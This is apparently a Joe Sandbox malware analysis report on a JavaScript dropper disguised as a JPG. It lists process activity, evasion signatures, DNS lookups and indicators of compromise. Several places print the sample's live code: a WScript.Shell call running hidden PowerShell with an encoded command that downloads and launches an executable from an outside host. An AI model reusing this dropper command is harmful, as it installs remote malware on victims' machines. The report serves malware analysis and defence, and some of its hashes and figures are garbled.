ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:

Transcription

1 ID: 371 Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:0 Date: 21/11/2017 Version:

2 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence Classification Signature Overview Software Vulnerabilities: Networking: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Domains Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted IPs Static File Info File Icon Network Behavior TCP Packets UDP Packets DNS Queries Code Manipulations Statistics Behavior System Behavior Copyright Joe Security LLC 2017 Page 2 of 13

3 Analysis Process: wscript.exe PID: 304 Parent PID: 24 File Activities Analysis Process: powershell.exe PID: 310 Parent PID: 304 File Activities Analysis Process: powershell.exe PID: 3220 Parent PID: 310 File Activities File Created File Deleted Registry Activities Disassembly Code Analysis JavaScript Code Call Graph Script: Code Copyright Joe Security LLC 2017 Page 3 of 13

4 Analysis Report Overview Information Joe Sandbox Version: Analysis ID: 371 Start time: 14:32:0 Joe Sandbox Product: CloudBasic Start date: Overall analysis duration: Hypervisor based Inspection enabled: Report type: Sample file name: Cookbook file name: 0h 1m 4s light 21PO jpg...js default.jbs Analysis system description: Windows 7 SP1 (with Office 20 SP2, IE 11, FF 54, Chrome 0, Acrobat Reader DC 17, Flash 2, Java ) Number of analysed new started processes analysed: 5 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Detection: Classification: MAL HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) mal5.winjs@5/2@1/0 HCA Information: Successful, ratio: 0% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: HDC Information: Cookbook Comments: Warnings: Failed Failed Found application associated with file extension:.js Stop behavior analysis, all processes terminated Show All Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java,.Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe Detection Strategy Score Range Reporting Detection Threshold Report FP / FN Confidence Copyright Joe Security LLC 2017 Page 4 of 13

5 Strategy Score Range Further Analysis Required? Threshold Confidence Classification Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Signature Overview Copyright Joe Security LLC 2017 Page 5 of 13

6 Software Vulnerabilities Networking Data Obfuscation Spreading System Summary HIPS / PFW / Operating System Protection Evasion Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section Software Vulnerabilities: JavaScript source code contains functionality to generate code involving a shell, file or stream Networking: Performs DNS lookups Urls found in memory or binary data Data Obfuscation: Suspicious powershell command line found Spreading: Enumerates the file system System Summary: Uses Microsoft Silverlight Uses new MSVCR Dlls Binary contains paths to debug symbols Classification label Creates files inside the user directory Found command line output Parts of this applications are using the.net runtime (Probably coded in C#) Reads ini files Reads software policies Spawns processes Uses an in-process (OLE) Automation server Creates mutexes Java / VBScript file with very long strings (likely obfuscated code) Reads the hosts file Suspicious javascript / visual basic script found (invalid extension) Wscript starts Powershell (via cmd or directly) HIPS / PFW / Operating System Protection Evasion: Very long cmdline option found, this is very uncommon (may be encrypted or packed) Copyright Joe Security LLC 2017 Page of 13

7 Anti Debugging: Creates guard pages, often used to prevent reverse engineering and debugging Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Enables debug privileges Malware Analysis System Evasion: Queries a list of all running processes Contains long sleeps (>= 3 min) Enumerates the file system Found WSH timer for Javascript or VBS script (likely evasive script) May sleep (evasive loops) to hinder dynamic analysis Hooking and other Techniques for Hiding and Protection: Disables application error messsages (SetErrorMode) Language, Device and Operating System Detection: Queries the cryptographic machine GUID Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Behavior Graph Behavior Graph ID: 371 Sample: 21PO jpg... Startdate: 21/11/2017 Architecture: WINDOWS Score: 5 started wscript.exe 1 Hide Legend Legend: Process Signature Created File DNS/IP Info Is Dropped Is Windows Process Number of created Registry Values Number of created Files Visual Basic Suspicious powershell command line found Wscript starts Powershell (via cmd or directly) started Delphi Java.Net C# or VB.NET powershell.exe C, C++ or other language Is malicious Suspicious powershell command line found started powershell.exe infobosc.myhostpoint.ch Suspicious powershell command line found Copyright Joe Security LLC 2017 Page 7 of 13

8 Simulations Behavior and APIs Time Type Description 14:32:17 API Interceptor 1x Sleep call for process: wscript.exe modified from: 0000ms to: 500ms 14:32:1 API Interceptor 1x Sleep call for process: powershell.exe modified from: 0000ms to: 500ms Antivirus Detection Initial Sample No Antivirus matches Dropped Files No Antivirus matches Domains Detection Cloud Link infobosc.myhostpoint.ch 2% virustotal Browse Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs Copyright Joe Security LLC 2017 Page of 13

9 No context Domains No context ASN No context Dropped Files No context Startup System is w7 wscript.exe (PID: 304 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\21PO jpg...js' MD5: 7D747EACB17ADF5204A) powershell.exe (PID: 310 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' POWERSHELL.eXE -ex bypass -NoP -w HidDEn -EC IAAo AE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAUwB0AEUATQAuAG4ARQBUAC4AdwBlAGIAYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4ATABvAGEARABmAEkAbABl ACgAIAAdIGgAdAB0AHAAOgAvACAaQBuAGYAbwBiAGAcwBjAC4AbQB5AGgAbwBzAHQAcABvAGkAbgB0AC4AYwBoACAcAB1AHQAdAB5AC4AZQB4AGUAHSAg ACwAIAAdICQAZQBuAFYAOgBBAFAAcABEAGEAdABBAFwAagBzAHMAcwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABhAHIAVAAgAB0gJABlAG4AVgAAGEAUABw AEQAQQB0AGEAXABqAHMAcwBzAC4AZQB4AGUAHSA= MD5: 2F44E405DB1AC55D7E3BFE3B132FA) powershell.exe (PID: 3220 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -NoP -w HidDEn -EC IAAoAE4AZQB3AC0ATwBi AEoAZQBDAFQAIABzAFkAUwB0AEUATQAuAG4ARQBUAC4AdwBlAGIAYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4ATABvAGEARABmAEkAbABlACgAIAAdIGgAdAB0 AHAAOgAvACAaQBuAGYAbwBiAGAcwBjAC4AbQB5AGgAbwBzAHQAcABvAGkAbgB0AC4AYwBoACAcAB1AHQAdAB5AC4AZQB4AGUAHSAgACwAIAAdICQAZQBu AFYAOgBBAFAAcABEAGEAdABBAFwAagBzAHMAcwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABhAHIAVAAgAB0gJABlAG4AVgAAGEAUABwAEQAQQB0AGEAXABq AHMAcwBzAC4AZQB4AGUAHSA= MD5: 2F44E405DB1AC55D7E3BFE3B132FA) cleanup Created / dropped Files C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D7DLDFKTQNJMVF7WU.temp File Type: MD5: SHA1: SHA-25: SHA-5: Malicious: Reputation: data 374EED44FE322D77E3FF175BBB 213D7B2A0F EA74AA3D1F2A3DE54B2 7442B455FB1F4040AEAE4BC7EACADA7A72E50BB5D5200D1421FE5F C472E34A2B131FE7C B07FA4F2DBB55B157F D5502BBE5BF4B550074FDCF 7B727F5EFE7CEF7A7FA04C70BC0 low C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z3FLG5PRKBHLNDSPCKN.temp File Type: MD5: SHA1: SHA-25: SHA-5: Malicious: Reputation: data 374EED44FE322D77E3FF175BBB 213D7B2A0F EA74AA3D1F2A3DE54B2 7442B455FB1F4040AEAE4BC7EACADA7A72E50BB5D5200D1421FE5F C472E34A2B131FE7C B07FA4F2DBB55B157F D5502BBE5BF4B550074FDCF 7B727F5EFE7CEF7A7FA04C70BC0 low Contacted Domains/Contacted IPs Contacted Domains Name IP Active Malicious Antivirus Detection infobosc.myhostpoint.ch unknown unknown 2%, virustotal, Browse Contacted IPs Copyright Joe Security LLC 2017 Page of 13

10 No contacted IP infos No contacted IP infos Static File Info File type: TrID: File name: File size: 520 MD5: SHA1: SHA25: SHA5: File Content Preview: ASCII text, with very long lines, with CRLF line t erminators 21PO jpg...js 13b3350b5442eac05ea4c3b202ee ce c45bbf2ed0d0c452dffa00e 0c5fe5d0d73343a32e3d3acbe4b37a0cb d1ea20c0ff2b40 4ac431b4213a47a00ed0c7bfcd1a2edd043f0 f1724eda44b05ea2c27f5c07bbc17ebd4d53ec 032be04ab5e5ed02527ca5ccea new ActiveXObject("wSCRiPt.Shell").RUN( '"POwErSH ElL.exE" POWERSHELL.eXE -ex bypass -NoP -w Hid DEn -EC IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAI ABzAFkAUwB0AEUATQAuAG4ARQBUAC4AdwBlAGI AYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4ATABv AGEARABmAEkAbABlACgAIAAdIGgAdAB0AHAAOgA vac File Icon Network Behavior TCP Packets Timestamp Port Dest Port IP Dest IP Nov 21, :32: CET UDP Packets Timestamp Port Dest Port IP Dest IP Nov 21, :32: CET DNS Queries Timestamp IP Dest IP Trans ID OP Code Name Type Class Nov 21, :32: CET xbbe4 Standard query (0) infobosc.m yhostpoint.ch A (IP address) IN (0x0001) Code Manipulations Statistics Behavior Copyright Joe Security LLC 2017 Page of 13

11 wscript.exe powershell.exe powershell.exe Click to jump to process System Behavior Analysis Process: wscript.exe PID: 304 Parent PID: 24 Start time: 14:32:17 Start date: 21/11/2017 Path: Wow4 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: Reputation: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\21PO jpg...js' 0x bytes 7D747EACB17ADF5204A C, C++ or other language moderate File Activities File Path Access Attributes Options Completion Count Analysis Process: powershell.exe PID: 310 Parent PID: 304 Start time: 14:32:17 Start date: 21/11/2017 Path: Wow4 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: Reputation: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' POWERSHELL.eXE -ex bypass -NoP -w HidDEn -EC IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAUwB 0AEUATQAuAG4ARQBUAC4AdwBlAGIAYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4 ATABvAGEARABmAEkAbABlACgAIAAdIGgAdAB0AHAAOgAvACAaQBuAGYAbwBiAGAcwBjA C4AbQB5AGgAbwBzAHQAcABvAGkAbgB0AC4AYwBoACAcAB1AHQAdAB5AC4AZ QB4AGUAHSAgACwAIAAdICQAZQBuAFYAOgBBAFAAcABEAGEAdABBAFwAagBzA HMAcwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABhAHIAVAAgAB0gJABlAG4AV gaageauabwaeqaqqb0ageaxabqahmacwbzac4azqb4aguahsa= 0x755c bytes 2F44E405DB1AC55D7E3BFE3B132FA.Net C# or VB.NET moderate Copyright Joe Security LLC 2017 Page 11 of 13

12 File Activities File Path Access Attributes Options Completion Count Old File Path New File Path Completion Count File Path Offset Length Value Ascii Completion Count Analysis Process: powershell.exe PID: 3220 Parent PID: 310 Start time: 14:32:1 Start date: 21/11/2017 Path: Wow4 process (32bit): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -NoP -w HidDEn - EC IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAUwB0AEUATQAuAG4ARQB UAC4AdwBlAGIAYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4ATABvAGEARABmAEk AbABlACgAIAAdIGgAdAB0AHAAOgAvACAaQBuAGYAbwBiAGAcwBjAC4AbQB5AGgAbwBzA HQAcABvAGkAbgB0AC4AYwBoACAcAB1AHQAdAB5AC4AZQB4AGUAHSAgACwAI AAdICQAZQBuAFYAOgBBAFAAcABEAGEAdABBAFwAagBzAHMAcwAuAGUAeABlA B0gIAApACAAOwAgAHMAdABhAHIAVAAgAB0gJABlAG4AVgAAGEAUABwAEQAQ QB0AGEAXABqAHMAcwBzAC4AZQB4AGUAHSA= Imagebase: File size: MD5 hash: Programmed in: Reputation: 0x753f bytes 2F44E405DB1AC55D7E3BFE3B132FA.Net C# or VB.NET moderate File Activities File Created File Path Access Attributes Options Completion Count C:\Users\user\AppData\Roaming\jsss.exe read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait 1 104F7 CreateFileW File Deleted File Path Completion Count Address C:\Users\user\AppData\Roaming\jsss.exe success or wait 1 DDA DeleteFileW Symbol Old File Path New File Path Completion Count File Path Offset Length Value Ascii Completion Count Registry Activities Key Path Completion Count Key Path Name Type Data Completion Count Disassembly Copyright Joe Security LLC 2017 Page of 13

13 Code Analysis JavaScript Code Call Graph Hide Legend Executed Not Executed entry:c0 RUN Script: Code 0 new ActiveXObject ( "wscript.shell" ).RUN ( '"POwErSHElL.exE" POWERSHELL.eXE -ex bypass -NoP -w HidDEn -E C IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAUwB0AEUATQAuAG4ARQBUAC4AdwBlAGIAYwBsAGkAZQBuA FQAKQAuAEQATwBXAE4ATABvAGEARABmAEkAbABlACgAIAAdIGgAdAB0AHAAOgAvACAaQBuAGYAbwBiAGAc wbjac4abqb5aggabwbzahqacabvagkabgb0ac4aywboacacab1ahqadab5ac4azqb4aguahsagacwaiaadic QAZQBuAFYAOgBBAFAAcABEAGEAdABBAFwAagBzAHMAcwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABhAHIAVA AgAB0gJABlAG4AVgAAGEAUABwAEQAQQB0AGEAXABqAHMAcwBzAC4AZQB4AGUAHSA= ', 0 ); RUN(""POwErSHElL.exE" POWERSHELL.eXE -ex b IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzA AYwBsAGkAZQBuAFQAKQAuAEQATwBXAE4AT AHAAOgAvACAaQBuAGYAbwBiAGAcwBjAC4A BoACAcAB1AHQAdAB5AC4AZQB4AGUAHSAgA AdABBAFwAagBzAHMAcwAuAGUAeABlAB0gIAA G4AVgAAGEAUABwAEQAQQB0AGEAXABqAHM Copyright Joe Security LLC 2017 Page 13 of 13